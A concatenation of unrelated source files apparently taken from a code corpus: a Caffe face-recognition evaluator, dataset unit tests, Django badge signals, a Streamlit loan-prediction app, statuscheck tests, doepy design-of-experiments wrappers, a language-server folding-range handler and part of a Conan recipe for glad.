        #print(df_confusion)
        #plot_confusion_matrix(df_confusion)
        return (accept_sum / total_count)
    #process a text file
    def evaluate3(self,metric='cosine'):
        # Like evaluate2 but reads pre-extracted per-class query features from
        # disk and also reports top-5 accuracy. Returns [top1, top5].
        feature1=np.fromfile('./features/' + model_name +'-features.dat',dtype=np.float64)
        feature1=np.reshape(feature1,(class_size,feature_size))
        class_index = 0
        image_index = 0
        total_count = 0.0
        accept_sum = 0
        top5_accept_sum = 0
        actual = []
        predict = []
        for filename in filenames:
            #query-feature
            #X=self.read_imagelist(filelist_path + filename + extension)
            test_num = filecount[class_index]#np.shape(X)[0]
            feature2=np.fromfile('./features/' + model_name +'-features-c' + str(class_index) + '.dat',dtype=np.float64)
            feature2=np.reshape(feature2,(test_num,feature_size))
            mt=pw.cosine_similarity(feature2, feature1)
            top5_accept = 0
            confusion_array = np.zeros((class_size), dtype = np.int)
            for i in range(test_num):
                actual.append(class_index)
                sort_array = np.zeros((class_size), dtype = np.float64)
                for j in range(class_size):
                    sort_array[j] = mt[i][j]
                    if np.max(mt[i]) == mt[i][j]:
                        confusion_array[j] += 1
                        predict.append(j)
                        break
                #print(sort_array)
                sort_array.sort()
                #print(sort_array)
                # Top-5: the true class's similarity appears among the five
                # largest values after the ascending sort.
                for j in range((class_size - 5),class_size):
                    if sort_array[j] == mt[i][class_index]:
                        top5_accept += 1
                        break
                image_index += 1
            total_count += test_num
            accept_sum += confusion_array[class_index]
            top5_accept_sum += top5_accept
            class_index += 1
        print 'total:%d' % (round(total_count))
        print 'accept:%d' % (accept_sum)
        print 'reject:%d' % (round(total_count) - accept_sum)
        print 'top 1 accuray:%.4f' % (accept_sum / total_count)
        print 'top 5 accuray:%.4f' % (top5_accept_sum / total_count)
        #conf_mat = confusion_matrix(actual,predict)
        #print(conf_mat)
        actual = np.array(actual)
        predict = np.array(predict)
        y_actual = pd.Series(actual, name='Actual')
        y_predict = pd.Series(predict, name='Predicted')
        df_confusion = pd.crosstab(y_actual,y_predict, rownames=['Actual'], colnames=['Predicted'], margins=True)
        print(df_confusion)
        #plot_confusion_matrix(df_confusion)
        result = []
        result.append(accept_sum / total_count)
        result.append(top5_accept_sum / total_count)
        return result
    #save features
    def saveFeature(self):
        # Extract 'deepid' embeddings for every class list, dump the raw
        # per-class features and the per-class mean features to ./features/.
        averages=np.zeros((class_size,feature_size),dtype=np.float64)
        i=0
        for filename in filenames:
            #query-feature
            X=self.read_imagelist(filelist_path + filename + extension)
            test_num=np.shape(X)[0]
            out = self.forward_all(data=X)
            feature2=np.float64(out['deepid'])
            feature2.tofile('./features/' + model_name + '-features-c' + str(i) + '.dat')
            feature2=np.reshape(feature2,(test_num,feature_size))
            average=np.zeros((feature_size),dtype=np.float64)
            for j in range(test_num):
                average[:] = average[:] + feature2[j,:]
            average[:]=average[:]/test_num
            averages[i,:]=average[:]
            i=i+1
        averages.tofile('./features/' + model_name + '-features.dat')
    #process an image file
    def getFeature2(self,imgfile):
        # Load one image, channel-swap it the same way as read_imagelist,
        # and return its (1, feature_size) 'deepid' embedding.
        img=skimage.io.imread(imgfile,as_grey=False)
        resized =skimage.transform.resize(img,(self.image_dims[0], self.image_dims[1]))*255
        X=np.empty((1,3,self.image_dims[0],self.image_dims[1]))
        X[0,0,:,:]=resized[:,:,2]
        X[0,1,:,:]=resized[:,:,0]
        X[0,2,:,:]=resized[:,:,1]
        test_num=np.shape(X)[0]
        out = self.forward_all(data=X)
        #extract feature
        feature = np.float64(out['deepid'])
        feature=np.reshape(feature,(test_num,feature_size))
        return feature
    def compare_pic(self,feature1,feature2):
        # Cosine *distance* between two feature matrices (smaller = closer).
        predicts=pw.pairwise_distances(feature2, feature1,'cosine')
        #predicts=pw.cosine_similarity(feature1, feature2)
        return predicts
    def compare_pic2(self,path1,path2):
        # Convenience wrapper: embed both image files and compare them.
        feature1 = self.getFeature2(path1)
        feature2 = self.getFeature2(path2)
        predicts = self.compare_pic(feature1,feature2)
        return predicts
    def classify(self,path):
        # Print the distance from the query image to each sample image listed
        # in ./filelist/sample.txt.
        feature1 = self.getFeature2(path)
        fid=open('./filelist/sample.txt')
        lines=fid.readlines()
        test_num=len(lines)
        fid.close()
        i =0
        msg='out:'
        for line in lines:
            word=line.split('\n')
            filename=word[0]
            feature2 = self.getFeature2(filename)
            predicts = self.compare_pic(feature1,feature2)
            tmp='(%d,%f)'%(i,predicts)
            msg=msg+tmp
            i=i+1
        print msg
# Evaluation driver: load one (or more) triplet-net snapshots and collect
# top-1/top-5 accuracies via Recognizer.evaluate3().
if __name__ == '__main__':
    step = 2
    top1_accuracy = []
    top5_accuracy = []
    # NOTE(review): range(30, 31) evaluates exactly one snapshot (iteration
    # 60); widen the range to sweep multiple checkpoints.
    for i in range(30,30 + 1):
        iteration = str(i * step)
        tripletnet= Recognizer('./models/deploy.prototxt',
                               './data/models/triplet/alexnet_triplet_iter_' + iteration + '.caffemodel',
                               './data/models/softmax/mean.binaryproto')
        #alexnet= Recognizer('/home/frank/triplet-master/data/models/softmax/deploy.prototxt',
        #                    '/home/frank/digits/digits/jobs/20170429-175608-c101/snapshot_iter_' + iteration + '.caffemodel',
        #                    '/home/frank/triplet-master/data/models/softmax/mean.binaryproto')
        ##ALEXNET TEST
        #start = time.time()
        #model_accuracy = alexnet.test_alex()
        ##TRIPLET TEST
        #tripletnet.saveFeature()
        # evaluate3 returns [top1, top5].
        model_accuracy = tripletnet.evaluate3()
        top1_accuracy.append(model_accuracy[0])
        top5_accuracy.append(model_accuracy[1])
        #with open(accuracy_path + model_name + '-top1-' +iteration + '.txt', 'w') as file:
        #    file.write(str(model_accuracy[0]))
        #with open(accuracy_path + model_name + '-top5-' +iteration + '.txt', 'w') as file:
        #    file.write(str(model_accuracy[1]))
    top1_accuracy = np.array(top1_accuracy)
    #top1_accuracy.tofile(accuracy_path + model_name + '-top1.dat')
    #np.savetxt(accuracy_path + model_name + '-top1.out',top1_accuracy,delimiter=',')
    top5_accuracy = np.array(top5_accuracy)
    #top5_accuracy.tofile(top5_accuracy + model_name + '-top5.dat')
    #np.savetxt(accuracy_path + model_name + '-top5.out',top5_accuracy,delimiter=',')
    #print(accuracy)
|
11521253
|
import unittest
import warnings
import torch
from tqdm import tqdm
from data.utils import get_db_container, get_db_info
from utils import get_dataloader, get_train_val_test_datasets
# Kaggle databases the dataset/dataloader tests below run against.
dataset_names = ('acquirevaluedshopperschallenge',
                 'homecreditdefaultrisk',
                 'kddcup2014')
class TestDatabaseDataset(unittest.TestCase):
    """Invariants of the raw (pre-collation) graph datasets."""
    def test_datapoints_for_no_self_loops_and_nonnegative_edge_types(self):
        """Raw datapoints must contain no self loops and only edge types >= 0."""
        for db_name in dataset_names:
            for dataset in get_train_val_test_datasets(dataset_name=db_name,
                                                       train_test_split='use_full_train',
                                                       encoders=dict(
                                                           CATEGORICAL='CategoricalOrdinalEnc',
                                                           SCALAR='ScalarRobustScalerEnc',
                                                           DATETIME='DatetimeScalarEnc',
                                                           LATLONG='LatLongScalarEnc',
                                                           TEXT='TextSummaryScalarEnc'), ):
                for dp_id, (edge_list, node_types, edge_types, features, label) in tqdm(dataset):
                    # Nodes don't have any self loops in the raw data
                    for edge in edge_list:
                        self.assertNotEqual(edge[0], edge[1])
                    # All edge types are nonnegative in the raw data
                    self.assertTrue(all(et >= 0 for et in edge_types))
    def test_train_val_and_test_splits_contain_different_datapoints(self):
        """Train/val/test splits must be pairwise disjoint for every split scheme."""
        for train_test_split in ['use_full_train', 'xval0', 'xval1', 'xval2', 'xval3', 'xval4']:
            for db_name in dataset_names:
                train_data, val_data, test_data = get_train_val_test_datasets(dataset_name=db_name,
                                                                              train_test_split=train_test_split,
                                                                              encoders=dict(
                                                                                  CATEGORICAL='CategoricalOrdinalEnc',
                                                                                  SCALAR='ScalarRobustScalerEnc',
                                                                                  DATETIME='DatetimeScalarEnc',
                                                                                  LATLONG='LatLongScalarEnc',
                                                                                  TEXT='TextSummaryScalarEnc'), )
                self.assertEqual(0, len(
                    set(train_data.datapoint_ids).intersection(val_data.datapoint_ids).intersection(
                        test_data.datapoint_ids)))
class TestDataBaseClass:
    """Namespace wrapper so the inner TestCase is not collected directly;
    concrete per-database suites subclass TestData and set `db_name`."""
    class TestData(unittest.TestCase):
        # Database to test; must be overridden by subclasses.
        db_name = None
        def setUp(self):
            """Build sequential train/val/test loaders for `db_name`."""
            self.db_info = get_db_info(self.db_name)
            batch_size = 1
            num_workers = 0
            max_nodes_per_graph = 100000
            # Ensure the database container is running before loading data.
            _ = get_db_container(self.db_name)
            train_data, val_data, test_data = get_train_val_test_datasets(dataset_name=self.db_name,
                                                                          train_test_split='use_full_train',
                                                                          encoders=dict(
                                                                              CATEGORICAL='CategoricalOrdinalEnc',
                                                                              SCALAR='ScalarRobustScalerEnc',
                                                                              DATETIME='DatetimeScalarEnc',
                                                                              LATLONG='LatLongScalarEnc',
                                                                              TEXT='TextSummaryScalarEnc'), )
            train_loader = get_dataloader(dataset=train_data,
                                          batch_size=batch_size,
                                          sampler_class_name='SequentialSampler',
                                          num_workers=num_workers,
                                          max_nodes_per_graph=max_nodes_per_graph)
            val_loader = get_dataloader(dataset=val_data,
                                        batch_size=batch_size,
                                        sampler_class_name='SequentialSampler',
                                        num_workers=num_workers,
                                        max_nodes_per_graph=max_nodes_per_graph)
            test_loader = get_dataloader(dataset=test_data,
                                         batch_size=batch_size,
                                         sampler_class_name='SequentialSampler',
                                         num_workers=num_workers,
                                         max_nodes_per_graph=max_nodes_per_graph)
            self.loaders = {'train': train_loader,
                            'val': val_loader,
                            'test': test_loader}
        def test_loaded_datapoints(self):
            """Collated batches: edge symmetry, self loops, feature keys, labels."""
            label_node_type, label_feature_name = self.db_info['label_feature'].split('.')
            for split, loader in self.loaders.items():
                with warnings.catch_warnings():
                    warnings.simplefilter('ignore')
                    for bdgl, features, label in tqdm(loader):
                        # No empty graphs
                        self.assertGreater(bdgl.number_of_nodes(), 0)
                        # Every edge has an equal and opposite edge with negative edge type
                        uvt = torch.stack((*bdgl.all_edges('uv', 'eid'), bdgl.edata['edge_types'])).t()
                        u_v_type = []
                        v_u_negtype = []
                        for u, v, type in uvt.tolist():
                            u_v_type.append((u, v, type))
                            v_u_negtype.append((v, u, -type))
                        u_v_type_set = set(u_v_type)
                        v_u_negtype_set = set(v_u_negtype)
                        self.assertEqual(uvt.shape[0], len(u_v_type_set))  # Make sure no redundant edges
                        self.assertEqual(u_v_type_set, v_u_negtype_set)
                        # Every node gets a self loop after collation
                        for i in range(bdgl.number_of_nodes()):
                            self.assertIn((i, i, 0), u_v_type_set)
                        # Self loops have type 0
                        for u, v, type in u_v_type:
                            if u == v:
                                self.assertEqual(0, type)
                        # Features have all the right keys and numbers of values
                        self.assertGreater(len(features.keys()), 0)
                        for node_type, feats in features.items():
                            feat_keys = set(feats.keys())
                            # Ignore the label feature
                            if node_type == label_node_type:
                                feat_keys = feat_keys.union([label_feature_name])
                            self.assertEqual(feat_keys, self.db_info['node_types_and_features'][node_type].keys())
                            node_type_int = self.db_info['node_type_to_int'][node_type]
                            n_nodes_this_type = (bdgl.ndata['node_types'] == node_type_int).sum().item()
                            for feat_vals in feats.values():
                                self.assertEqual(n_nodes_this_type, feat_vals.shape[0])
                        # Only test points have labels
                        if split == 'test':
                            self.assertIsNone(label)
                        else:
                            self.assertIsNotNone(label)
                        # Label isn't present in features
                        self.assertNotIn(label_feature_name, features[label_node_type].keys())
        def test_null_counts_in_database_are_reasonable_and_match_preprocessed_datapoints(self):
            """Null counts seen in datapoints must equal those recorded in db_info."""
            # Count up nulls in preprocessed datapoints
            n_null_counts = {}
            for split, loader in self.loaders.items():
                for _, (_, _, _, features, _) in tqdm(loader.dataset):
                    for node_type, f in features.items():
                        n_null_counts.setdefault(node_type, {})
                        for feature_name, values in f.items():
                            n_null_counts[node_type].setdefault(feature_name, 0)
                            n_null_counts[node_type][feature_name] += values.count(None)
            # Make sure nulls in preprocessed datapoints match those in db_info
            for node_type, features in self.db_info['node_types_and_features'].items():
                for feature_name, feature_info in features.items():
                    # Skip target feature, because it's not in the node features
                    if self.db_info['label_feature'] == '{}.{}'.format(node_type, feature_name):
                        continue
                    self.assertEqual(n_null_counts[node_type][feature_name], feature_info['n_null_values'],
                                     f'node_type: {node_type}, feature_name: {feature_name}')
|
11521269
|
from os.path import dirname, basename
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from django.db.models import get_apps, get_models, signals
from django.utils.importlib import import_module
from django.utils.module_loading import module_has_submodule
import badger
import badger.utils
if "notification" in settings.INSTALLED_APPS:
from notification import models as notification
from django.utils.translation import ugettext_noop as _
def create_notice_types(app, created_models, verbosity, **kwargs):
notices = (
("badge_edited", _(u"Badge edited"),
_(u"one of your badges has been edited")),
("badge_awarded", _(u"Badge awarded"),
_(u"one of your badges has been awarded to someone")),
("award_received", _(u"Award received"),
_(u"you have been awarded a badge")),
#("award_accepted", _(u"Badge award accepted"),
# _(u"someone has accepted an award for one of your badges")),
#("award_declined", _(u"Badge award declined"),
# _(u"someone has declined an award for one of your badges")),
# TODO: Notification on progress?
("nomination_submitted", _(u"Nomination submitted"),
_(u"someone has submitted a nomination for one of your badges")),
("nomination_approved", _(u"Nomination approved"),
_(u"a nomination you submitted for an award has been approved")),
("nomination_rejected", _(u"Nomination rejected"),
_(u"a nomination you submitted for an award has been rejected")),
("nomination_received", _(u"Nomination received"),
_(u"a nomination to award you a badge was approved")),
("nomination_accepted", _(u"Nomination accepted"),
_(u"a nomination you submitted for an award has been accepted")),
)
for notice in notices:
notification.create_notice_type(*notice)
signals.post_syncdb.connect(create_notice_types, sender=notification)
def update_badges(overwrite=False):
    """Load badge fixtures and badge definitions for every installed app.

    For each app in INSTALLED_APPS that provides an ``<app>.badges``
    submodule: load its ``<app>_badges`` fixture, register any ``badges``
    sequence via ``badger.utils.update_badges``, and invoke the module's
    own ``update_badges(overwrite)`` hook when present.

    ImportError is expected for apps without a ``badges`` submodule and is
    ignored; if the submodule exists but fails to import, the error is
    re-raised so real bugs are not swallowed.

    :param overwrite: passed through to badge registration; when True,
        existing badge records are overwritten.
    """
    # FIX: removed a redundant local `from django.utils.importlib import
    # import_module` that shadowed the identical module-level import.
    for app in settings.INSTALLED_APPS:
        mod = import_module(app)
        try:
            badges_mod = import_module('%s.badges' % app)
            fixture_label = '%s_badges' % app.replace('.', '_')
            call_command('loaddata', fixture_label, verbosity=1)
            if hasattr(badges_mod, 'badges'):
                badger.utils.update_badges(badges_mod.badges, overwrite)
            if hasattr(badges_mod, 'update_badges'):
                badges_mod.update_badges(overwrite)
        except ImportError:
            # Only re-raise when the app really has a `badges` submodule,
            # i.e. the ImportError came from inside it.
            if module_has_submodule(mod, 'badges'):
                raise
# Refresh badge definitions after every syncdb of the badger app.
signals.post_syncdb.connect(lambda *args, **kwargs: update_badges(),
                            sender=badger.models)
|
11521293
|
import pandas as pd
import numpy as np
from sklearn import metrics
import streamlit as st
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
df=pd.read_csv("data.csv")
df = df.drop(['ID','Experience'], axis = 1)
X=df[['Age','Income','CCAvg','Education','Mortgage','Securities Account','Online',"CreditCard"]].values
y=df['Personal Loan'].values
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X = sc.fit_transform(X)
from sklearn import preprocessing
X = preprocessing.normalize(X)
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)
def results(model):
    """Predict on the sidebar inputs (`ipt`) and show the outcome banner."""
    prediction = model.predict([ipt])
    if prediction == 1:
        message = "The Customer will avail the loan"
    else:
        message = "The Customer will not avail the loan"
    st.success(message)
# --- Page layout: header banner, sidebar input widgets, model picker ---
html_temp = '''
<div style = "background-color: rgba(25,25,112,0.06); padding-bottom: 20px; padding-top: 20px; padding-left: 5px; padding-right: 5px">
<center><h1>Bank Loan Modelling</h1></center>
</div>
'''
st.markdown(html_temp, unsafe_allow_html=True)
st.sidebar.subheader("Input Features")
st.sidebar.text("Specify your inputs here")
# Collect the feature vector in the same column order as X above.
ipt = []
ipt.append(st.sidebar.slider('Age',1,100,20))
ipt.append(st.sidebar.number_input('Income'))
ipt.append(st.sidebar.number_input('CCAvg'))
ipt.append(st.sidebar.radio('Education',[1,2,3]))
ipt.append(st.sidebar.number_input('Mortgage'))
ipt.append(st.sidebar.radio('Securities Account',[0,1]))
ipt.append(st.sidebar.radio('Online',[0,1]))
ipt.append(st.sidebar.radio('CreditCard',[0,1]))
html_temp_2 = '''
<div style = "padding-bottom: 20px; padding-top: 20px; padding-left: 20px; padding-right: 20px">
<center><h2>Model Selection</h2></center>
</div>
'''
st.markdown(html_temp_2, unsafe_allow_html=True)
select = st.selectbox("Please Select your model from the following options",("Please Select","Logistic Regression","Support Vector Machine","KNeighbours Classifier","Naive-Bayes Classifier"))
# Fit the chosen model and predict on demand. `model` is unbound until the
# user picks a real entry, so a premature "Predict" click raises NameError.
try:
    if select == "Logistic Regression":
        model = LogisticRegression()
        model.fit(X_train,y_train)
    if select == "Support Vector Machine":
        model = SVC(kernel = 'linear')
        model.fit(X_train,y_train)
    if select == "KNeighbours Classifier":
        model = KNeighborsClassifier(n_neighbors = 7)
        model.fit(X_train,y_train)
    if select == "Naive-Bayes Classifier":
        model = GaussianNB()
        model.fit(X_train,y_train)
    if st.button("Predict"):
        results(model)
except NameError:
    # BUG FIX: the original read `expect:`, which is a SyntaxError and made
    # the whole script unloadable. Catch only the "no model selected yet"
    # case instead of a bare except so real errors still surface.
    pass
|
11521303
|
import os
import pytest
from statuscheck.services import SERVICES
from statuscheck.utils import get_available_services, get_statuscheck_api
# Repository root: two directory levels above this test file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def test_get_available_services():
    """The service registry matches the service modules present on disk."""
    services = get_available_services()
    assert services
    services_dir = os.path.join(BASE_DIR, "statuscheck", "services")
    skip = {"__pycache__", "__init__.py"}
    expected = {
        name[:-3]  # strip the ".py" suffix to get the module name
        for name in os.listdir(services_dir)
        if name not in skip and os.path.isfile(os.path.join(services_dir, name))
    }
    assert set(services) == expected
@pytest.mark.parametrize("service", SERVICES)
def test_get_statuscheck_api(service):
    # Smoke-test every registered service: the wrapper must resolve the right
    # module and expose non-empty URLs plus a summary.
    api = get_statuscheck_api(service)
    summary = api.get_summary()
    assert api._module_name == service
    assert api.status_url
    assert api.service_url
    # NOTE(review): get_summary() presumably stores its result on api.summary —
    # both views must agree and serialise; confirm against the API class.
    assert api.summary
    assert api.summary == summary
    assert api.summary.as_dict()
|
11521304
|
from doepy.doe_functions import (
build_full_fact,
build_frac_fact_res,
build_plackett_burman,
build_sukharev,
build_box_behnken,
build_central_composite,
build_lhs,
build_space_filling_lhs,
build_random_k_means,
build_maximin,
build_halton,
build_uniform_random,
)
def full_fact(d):
    """Build a full factorial design dataframe.

    ``d`` maps factor names to their level lists, e.g.
    ``{'Pressure':[50,60,70],'Temperature':[290, 320, 350],'Flow rate':[0.9,1.0]}``.
    """
    return build_full_fact(d)
def frac_fact_res(d, res=None):
    """Build a 2-level fractional factorial design of a given resolution.

    Parameters
    ----------
    d : dict
        Factor/level ranges; only the min and max of each range are used
        (extra levels collapse to the extremes), e.g.
        ``{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}``.
    res : int, optional
        Desired design resolution — the length of the shortest word in the
        defining relation.  Defaults to half of the total factor count.
        Higher resolution means less confounding: resolution III designs may
        confound main effects with two-factor interactions, IV designs keep
        main effects clean but confound two-factor interactions with each
        other, and V designs keep two-factor interactions unconfounded up to
        three-factor interactions.

    Raises
    ------
    ValueError
        If no design with the requested resolution exists
        ("design not possible").

    Examples
    --------
    ``build_frac_fact_res({'A':[1,5],'B':[0.3,0.7],'C':[10,15],'D':[3,7],
    'E':[-2,-1]}, 3)`` yields 8 runs where a full factorial would need 2**5.
    """
    return build_frac_fact_res(d, res=res)
def plackett_burman(d):
    """Build a Plackett-Burman screening design dataframe.

    Only the min and max of each factor range in ``d`` are used, e.g.
    ``{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}``.
    Plackett-Burman designs estimate main effects with a minimal number of
    runs — row counts grow in multiples of four, and interactions between
    factors are treated as negligible.
    """
    return build_plackett_burman(d)
def sukharev(d, num_samples=None):
    """Build a Sukharev-grid hypercube design dataframe.

    Points are placed at the centroids of the hypercube subcells rather
    than on its boundaries, which is optimal for the covering radius under
    the max-norm.  ``num_samples ** (1 / n_factors)`` must be an integer.
    Only the min and max of each factor range in ``d`` are used.
    """
    return build_sukharev(d, num_samples=num_samples)
def box_behnken(d, center=1):
    """Build a Box-Behnken design dataframe.

    Three levels per factor are needed; missing middle levels are created
    automatically by linear mid-section, e.g.
    ``{'Pressure':[50,60,70],'Temperature':[290, 320, 350],'Flow rate':[0.9,1.0,1.1]}``.
    Box-Behnken designs place each factor at three equally spaced coded
    levels (-1, 0, +1) and support fitting a full quadratic response-surface
    model with a modest run count.
    """
    return build_box_behnken(d, center=center)
def central_composite(d, center=(2, 2), alpha="o", face="ccc"):
    """Build a central-composite design dataframe.

    Only the min and max of each factor range in ``d`` are used, e.g.
    ``{'Pressure':[50,70],'Temperature':[290, 350],'Flow rate':[0.9,1.0]}``.
    The design combines a (possibly fractional) two-level factorial
    portion, replicated center points, and axial points, so a second-order
    (quadratic) model can be fitted without a full three-level factorial.
    """
    return build_central_composite(d, center=center, alpha=alpha, face=face)
def lhs(d, num_samples=None, prob_distribution=None):
    """Build a Latin Hypercube design dataframe.

    Only the min and max of each factor range in ``d`` are used.
    ``num_samples`` sets how many design points are generated, and
    ``prob_distribution`` optionally shapes the randomized sampling —
    one of 'Normal', 'Poisson', 'Exponential', 'Beta', 'Gamma'.
    LHS is stratified sampling across multiple variables, commonly used to
    reduce the number of runs a Monte Carlo study needs.
    """
    return build_lhs(d, num_samples=num_samples, prob_distribution=prob_distribution)
def space_filling_lhs(d, num_samples=None):
    """Build a space-filling Latin Hypercube design dataframe.

    Only the min and max of each factor range in ``d`` are used;
    ``num_samples`` sets the number of design points generated.
    """
    return build_space_filling_lhs(d, num_samples=num_samples)
def random_k_means(d, num_samples=None):
    """Build a design from k-means clusters over a random unit hypercube.

    Produces a centroidal Voronoi tessellation of the unit random
    hypercube.  Only the min and max of each factor range in ``d`` are
    used; ``num_samples`` sets the number of design points.
    """
    return build_random_k_means(d, num_samples=num_samples)
def maximin(d, num_samples=None):
    """Build a maximin-reconstructed design dataframe.

    Iterates to maximize the minimal distance of each point to the other
    points in the set, to any existing (fixed) points, and to the
    hypercube boundary.  Only the min and max of each factor range in
    ``d`` are used; ``num_samples`` sets the number of design points.
    """
    return build_maximin(d, num_samples=num_samples)
def halton(d, num_samples=None):
    """Build a quasirandom (Halton-sequence) design dataframe.

    The sequence is seeded with the first n primes, one per factor.
    Only the min and max of each factor range in ``d`` are used;
    ``num_samples`` sets the number of design points.
    """
    return build_halton(d, num_samples=num_samples)
def uniform_random(d, num_samples=None):
    """Build a design sampled from a uniform random distribution.

    Only the min and max of each factor range in ``d`` are used;
    ``num_samples`` sets the number of design points generated.
    """
    return build_uniform_random(d, num_samples=num_samples)
|
11521356
|
from __future__ import annotations
from asyncio import CancelledError
from typing import TYPE_CHECKING, Any, List, Optional
from ....jsonrpc2.protocol import rpc_method
from ....utils.async_event import async_tasking_event
from ....utils.logging import LoggingDescriptor
from ..has_extend_capabilities import HasExtendCapabilities
from ..language import HasLanguageId
from ..text_document import TextDocument
from ..types import (
FoldingRange,
FoldingRangeParams,
ServerCapabilities,
TextDocumentIdentifier,
)
if TYPE_CHECKING:
from ..protocol import LanguageServerProtocol
from .protocol_part import LanguageServerProtocolPart
class FoldingRangeProtocolPart(LanguageServerProtocolPart, HasExtendCapabilities):
    """Implements the LSP ``textDocument/foldingRange`` request.

    Collection is delegated to listeners registered on the ``collect``
    event; this part aggregates their results and advertises the
    capability only when at least one listener exists.
    """
    _logger = LoggingDescriptor()
    def __init__(self, parent: LanguageServerProtocol) -> None:
        super().__init__(parent)
    @async_tasking_event
    async def collect(sender, document: TextDocument) -> Optional[List[FoldingRange]]:
        # Event hook: each subscriber returns folding ranges for *document*
        # (or None when it has nothing to contribute).
        ...
    def extend_capabilities(self, capabilities: ServerCapabilities) -> None:
        # Only advertise the capability if someone subscribed to `collect`.
        if len(self.collect):
            capabilities.folding_range_provider = True
    @rpc_method(name="textDocument/foldingRange", param_type=FoldingRangeParams)
    async def _text_document_folding_range(
        self, text_document: TextDocumentIdentifier, *args: Any, **kwargs: Any
    ) -> Optional[List[FoldingRange]]:
        """Handle the request by merging the results of all matching listeners."""
        results: List[FoldingRange] = []
        document = self.parent.documents[text_document.uri]
        # Run only listeners whose declared language id matches the document's;
        # listeners without a language id always run.
        for result in await self.collect(
            self,
            document,
            callback_filter=lambda c: not isinstance(c, HasLanguageId) or c.__language_id__ == document.language_id,
        ):
            if isinstance(result, BaseException):
                # Listener failures are logged and skipped; cancellation is
                # deliberately not treated as an error.
                if not isinstance(result, CancelledError):
                    self._logger.exception(result, exc_info=result)
            else:
                if result is not None:
                    results += result
        # Return None rather than an empty list when nothing folds.
        if len(results) == 0:
            return None
        return results
|
11521361
|
import os
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
class GladConan(ConanFile):
    """Conan recipe for glad, a GL/GLES/EGL/GLX/WGL loader generator.

    Exactly one specification (``spec``) is active at a time; the
    per-spec version options that do not apply are deleted in
    :meth:`configure` and are mapped onto GLAD's CMake cache variables in
    :meth:`_configure_cmake`.
    """
    name = "glad"
    description = "Multi-Language GL/GLES/EGL/GLX/WGL Loader-Generator based on the official specs."
    topics = ("conan", "glad", "opengl")
    url = "https://github.com/conan-io/conan-center-index"
    homepage = "https://github.com/Dav1dde/glad"
    license = "MIT"
    exports_sources = ["CMakeLists.txt", "patches/*.patch"]
    generators = "cmake"
    settings = "os", "compiler", "build_type", "arch"
    options = {
        "shared": [True, False],
        "fPIC": [True, False],
        "no_loader": [True, False],
        "spec": ["gl", "egl", "glx", "wgl"], # Name of the spec
        "extensions": "ANY", # Path to extensions file or comma separated list of extensions, if missing all extensions are included
        # if specification is gl
        "gl_profile": ["compatibility", "core"],
        "gl_version": ["None", "1.0", "1.1", "1.2", "1.3", "1.4", "1.5", "2.0",
                       "2.1", "3.0", "3.1", "3.2", "3.3", "4.0", "4.1", "4.2",
                       "4.3", "4.4", "4.5", "4.6"],
        "gles1_version": ["None", "1.0"],
        "gles2_version": ["None", "2.0", "3.0", "3.1", "3.2"],
        "glsc2_version": ["None", "2.0"],
        # if specification is egl
        "egl_version": ["None", "1.0", "1.1", "1.2", "1.3", "1.4", "1.5"],
        # if specification is glx
        "glx_version": ["None", "1.0", "1.1", "1.2", "1.3", "1.4"],
        # if specification is wgl
        "wgl_version": ["None", "1.0"]
    }
    default_options = {
        "shared": False,
        "fPIC": True,
        "no_loader": False,
        "spec": "gl",
        "extensions": "''",
        "gl_profile": "compatibility",
        "gl_version": "3.3",
        "gles1_version": "None",
        "gles2_version": "None",
        "glsc2_version": "None",
        "egl_version": "None",
        "glx_version": "None",
        "wgl_version": "None"
    }
    # Cached CMake helper so configure runs only once per build.
    _cmake = None
    @property
    def _source_subfolder(self):
        return "source_subfolder"
    @property
    def _build_subfolder(self):
        return "build_subfolder"
    def config_options(self):
        # fPIC has no meaning on Windows.
        if self.settings.os == "Windows":
            del self.options.fPIC
    def configure(self):
        """Prune inapplicable options and validate the spec/OS combination."""
        if self.options.shared:
            del self.options.fPIC
        # glad generates C code, so C++ standard/runtime settings are irrelevant.
        del self.settings.compiler.libcxx
        del self.settings.compiler.cppstd
        # Remove the version options that do not belong to the chosen spec so
        # they do not affect the package id.
        if self.options.spec != "gl":
            del self.options.gl_profile
            del self.options.gl_version
            del self.options.gles1_version
            del self.options.gles2_version
            del self.options.glsc2_version
        if self.options.spec != "egl":
            del self.options.egl_version
        if self.options.spec != "glx":
            del self.options.glx_version
        if self.options.spec != "wgl":
            del self.options.wgl_version
        if self.options.spec == "wgl" and self.settings.os != "Windows":
            raise ConanInvalidConfiguration("{0} specification is not compatible with {1}".format(self.options.spec,
                                                                                                  self.settings.os))
    def source(self):
        """Fetch the upstream sources and normalise the folder name."""
        tools.get(**self.conan_data["sources"][self.version])
        extracted_dir = self.name + "-" + self.version
        os.rename(extracted_dir, self._source_subfolder)
    def build(self):
        # Apply any version-specific patches before configuring.
        for patch in self.conan_data.get("patches", {}).get(self.version, []):
            tools.patch(**patch)
        cmake = self._configure_cmake()
        cmake.build()
    def _configure_cmake(self):
        """Map recipe options onto GLAD's CMake cache variables (cached)."""
        if self._cmake:
            return self._cmake
        self._cmake = CMake(self)
        # gl_profile only survives configure() when spec == "gl".
        if "gl_profile" in self.options:
            self._cmake.definitions["GLAD_PROFILE"] = self.options.gl_profile
        self._cmake.definitions["GLAD_API"] = self._get_api()
        self._cmake.definitions["GLAD_EXTENSIONS"] = self.options.extensions
        self._cmake.definitions["GLAD_SPEC"] = self.options.spec
        self._cmake.definitions["GLAD_NO_LOADER"] = self.options.no_loader
        # Non-Release builds use glad's debug generator variant.
        self._cmake.definitions["GLAD_GENERATOR"] = "c" if self.settings.build_type == "Release" else "c-debug"
        self._cmake.definitions["GLAD_EXPORT"] = True
        self._cmake.definitions["GLAD_INSTALL"] = True
        self._cmake.configure(build_folder=self._build_subfolder)
        return self._cmake
    def _get_api(self):
        """Return the GLAD_API string, e.g. ``gl=3.3``, skipping "None" versions."""
        if self.options.spec == "gl":
            spec_api = {
